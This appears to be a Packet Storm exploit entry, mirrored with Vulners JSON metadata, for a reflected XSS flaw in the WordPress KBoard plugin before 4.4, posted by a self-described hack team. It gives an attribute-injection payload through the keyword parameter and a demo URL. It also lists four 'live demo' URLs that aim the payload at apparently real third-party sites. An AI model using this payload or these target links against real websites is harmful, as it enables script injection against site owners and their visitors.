Search...

WordPress KBoard Cross Site Scripting

2016-09-30T00:00:00

ID PACKETSTORM:138917
Type packetstorm
Reporter T3NZOG4N
Modified 2016-09-30T00:00:00

Description

                                        
                                            `######################  
# Exploit Title : WordPress Plugin KBoard - Cross Site Scripting  
# Exploit Author : Persian Hack Team  
# Vendor Homepage : http://www.cosmosfarm.com/products/kboard  
# Category [ Webapps ]  
# Tested on [ Win ]  
# Version : Before 4.4  
# Date 2016/09/26  
######################  
#  
# PoC  
# =&gt;Cross Site Scripting :  
#  
# Payload : 1" onmouseover=prompt("Persian") bad="  
# Keyword Vulnerable To XSS  
# Demo :  
# http://www.site.com/wp-content/plugins/kboard/board.php?pageid=1&board_id=1&mod=list&target=&keyword=1" onmouseover=prompt("Persian") bad="  
#  
# Live Demo :  
#  
# http://www.vocalcoachjoe.com/wp-content/plugins/kboard/board.php?pageid=1&board_id=1&mod=list&target=&keyword=1%22+onmouseover%3Dprompt%28%22Persian%22%29+bad%3D%22  
#  
# http://www.dbvalley.com/wp-content/plugins/kboard/board.php?board_id=1&mod=list&target=&keyword=1%22+onmouseover%3Dprompt%28%22Persian%22%29+bad%3D%22  
#  
# http://www.shinhan.ca/wp-content/plugins/kboard/board.php?board_id=1&mod=list&target=&keyword=1%22+onmouseover%3Dprompt%28%22Persian%22%29+bad%3D%22  
#  
# http://www.dhcmooncake.com/wp-content/plugins/kboard/board.php?board_id=2&pageid=1&mod=list&target=&keyword=1%22+onmouseover%3Dprompt%28%22Persian%22%29+bad%3D%22  
#  
######################  
# Discovered by : FireKernel & T3NZOG4N & Mojtaba MobhaM   
# B3li3v3 M3 I will n3v3r St0p  
# Greetz : Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members  
# Homepage : http://persian-team.ir  
######################  
`

JSON Vulners Source

Initial Source

{"type": "packetstorm", "published": "2016-09-30T00:00:00", "reporter": "T3NZOG4N", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "80083886918bcd070b91c6aa5be9e6b8"}, {"key": "modified", "hash": "9363ed4f628af1fd2e7e39ddc1937567"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "9363ed4f628af1fd2e7e39ddc1937567"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "caa4965f28ee57b36039459276587d74"}, {"key": "sourceData", "hash": "8ce67f20ef18ae998bd2180821a6aec2"}, {"key": "sourceHref", "hash": "9f2e04ac2615d57b7827ddd370c33461"}, {"key": "title", "hash": "11f7f256bf80529f5db60351c8b3c83a"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`###################### \n# Exploit Title : WordPress Plugin KBoard - Cross Site Scripting \n# Exploit Author : Persian Hack Team \n# Vendor Homepage : http://www.cosmosfarm.com/products/kboard \n# Category [ Webapps ] \n# Tested on [ Win ] \n# Version : Before 4.4 \n# Date 2016/09/26 \n###################### \n# \n# PoC \n# =>Cross Site Scripting : \n# \n# Payload : 1\" onmouseover=prompt(\"Persian\") bad=\" \n# Keyword Vulnerable To XSS \n# Demo : \n# http://www.site.com/wp-content/plugins/kboard/board.php?pageid=1&board_id=1&mod=list&target=&keyword=1\" onmouseover=prompt(\"Persian\") bad=\" \n# \n# Live Demo : \n# \n# http://www.vocalcoachjoe.com/wp-content/plugins/kboard/board.php?pageid=1&board_id=1&mod=list&target=&keyword=1%22+onmouseover%3Dprompt%28%22Persian%22%29+bad%3D%22 \n# \n# http://www.dbvalley.com/wp-content/plugins/kboard/board.php?board_id=1&mod=list&target=&keyword=1%22+onmouseover%3Dprompt%28%22Persian%22%29+bad%3D%22 \n# \n# http://www.shinhan.ca/wp-content/plugins/kboard/board.php?board_id=1&mod=list&target=&keyword=1%22+onmouseover%3Dprompt%28%22Persian%22%29+bad%3D%22 \n# \n# http://www.dhcmooncake.com/wp-content/plugins/kboard/board.php?board_id=2&pageid=1&mod=list&target=&keyword=1%22+onmouseover%3Dprompt%28%22Persian%22%29+bad%3D%22 \n# \n###################### \n# Discovered by : FireKernel & T3NZOG4N & Mojtaba MobhaM \n# B3li3v3 M3 I will n3v3r St0p \n# Greetz : Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members \n# Homepage : http://persian-team.ir \n###################### \n`\n", "viewCount": 2, "history": [], "lastseen": "2016-11-03T10:18:45", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/138917/WordPress-KBoard-Cross-Site-Scripting.html", "sourceHref": "https://packetstormsecurity.com/files/download/138917/wpkboard-xss.txt", "title": "WordPress KBoard Cross Site Scripting", "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2016-11-03T10:18:45"}, "dependencies": {"references": [], "modified": "2016-11-03T10:18:45"}, "vulnersScore": -0.2}, "references": [], "id": "PACKETSTORM:138917", "hash": "05cc3ddbd69f875a648ef4cebf2314516472d5cd491b910c914d0be81ed3603b", "edition": 1, "cvelist": [], "modified": "2016-09-30T00:00:00", "description": ""}